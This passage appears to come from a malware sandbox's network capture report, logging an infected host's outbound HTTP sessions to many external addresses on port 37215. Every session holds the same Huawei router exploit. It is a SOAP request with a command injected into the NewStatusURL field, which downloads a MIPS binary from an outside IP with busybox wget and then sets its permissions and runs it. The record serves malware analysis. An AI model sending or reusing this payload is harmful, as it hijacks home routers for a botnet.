                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    406192.168.2.2348334197.50.165.937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261120081 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    407192.168.2.235766841.223.205.9037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261158943 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    408192.168.2.2342426156.177.250.15637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261204004 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    409192.168.2.234647041.215.248.21937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261255980 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    410192.168.2.2335684197.27.178.4837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261312008 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    411192.168.2.2345138156.193.29.18737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261368036 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    412192.168.2.234199241.57.81.21637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261421919 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    413192.168.2.234200041.32.165.2637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261460066 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    414192.168.2.2337822156.121.41.18537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261518002 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    415192.168.2.236060641.150.123.7537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.261573076 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 